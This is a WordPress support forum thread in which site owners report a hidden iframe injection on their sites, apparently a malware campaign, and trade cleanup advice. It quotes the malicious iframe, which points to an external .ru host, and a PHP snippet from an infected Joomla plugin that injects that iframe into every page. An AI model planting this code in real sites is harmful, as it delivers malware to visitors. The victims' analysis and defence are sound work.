WordPress.org

Ready to get started?Download WordPress

Forums

[closed] New malware code injection attack (11 posts)

  1. hauman
    Member
    Posted 1 year ago #

    This is being injected into my site (sfscope.com):

    <iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe></head>

    I'm searching as to where it could be coming from in WP, right now, I'm just trying to clean the site.

  2. B.Tom
    Member
    Posted 1 year ago #

    Same thing here.
    My webhost is OVH.
    I don't know from where the iframe has been injected, but it's not only for one website.
    I've some non-wordpress websites that have been infected too.
    All my files, on my server, with the ".php" extension that contains a <body> tag got the iframe placed above.

    Iv'e detected that one of my website had a blankpage. He's based on a Joomla CMS, ver1.5 . It's possible that the attack comes from this one. There's a Joomla plugin whiwh is called "bigshotgoogleanalytics". I found two lines at the end of the .php plugin that add the iframe at the Body :

    $buffer = str_replace ("<iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe></head>", $google_analytics_javascript."<iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe></head>", $buffer);
    JResponse::setBody($buffer);

    If someone had some news about that, thanks.

  3. cjchamberland
    Member
    Posted 1 year ago #

    What you have is typically a FTP account compromise or timthumb vulnerability but without checking the server logs for sure, it's just an assumption.

    Work your way through these resources and follow all instructions to completely clean your site or you may be hacked again. See FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex.</p>
    <p>Change all passwords. Scan your own PC.</p>
    <p>Tell your web host you got hacked; and consider changing to a more secure host: Recommended WordPress Web Hosting
    </p></div>

  4. hauman
    Member
    Posted 1 year ago #

    A few things:

    * It seems to be a WP 3.5 injection attack of some sort; there are older WP installs on the same server that are completely untouched. There may be a security hole somewhere in WP 3.5.

    * The code is injected everywhere it comes across </head>: header.php, custom-header.php, comments, plugins (a few times in Jetpack), active themes, inactive themes, etc.

  5. esmi
    Forum Moderator
    Posted 1 year ago #

    There may be a security hole somewhere in WP 3.5.

    There are no known security issues in WordPress 3.5. Your site being hacked does not imply any issues in the current version of WordPress. In fact the code you posted above looks like a typical injection hack on an insecure server or following an ftp leak. Follow cjchamberland's advise.

  6. hauman
    Member
    Posted 1 year ago #

    There are no known security issues in WordPress 3.5. Your site being hacked does not imply any issues in the current version of WordPress.

    Doing that as well; merely noting that the injection attack is only affecting WP3.5 installs on this server, and nothing earlier.

  7. mtalt
    Member
    Posted 1 year ago #

    We have also been having this issue with the same iframe since this morning. We are working with our hosting company to get to the cause of the problem. I will post here if we learn anything.

  8. vadim s. sabinich
    Member
    Posted 1 year ago #

  9. rodrigopolo
    Member
    Posted 1 year ago #

    I'm sure that there is something on version 3.5 or some plug-ins became someone was unable to write a file on my server and I have the latest version!

  10. esmi
    Forum Moderator
    Posted 1 year ago #

  11. esmi
    Forum Moderator
    Posted 1 year ago #

    And post your own topics.

Topic Closed

This topic has been closed to new replies.

About this Topic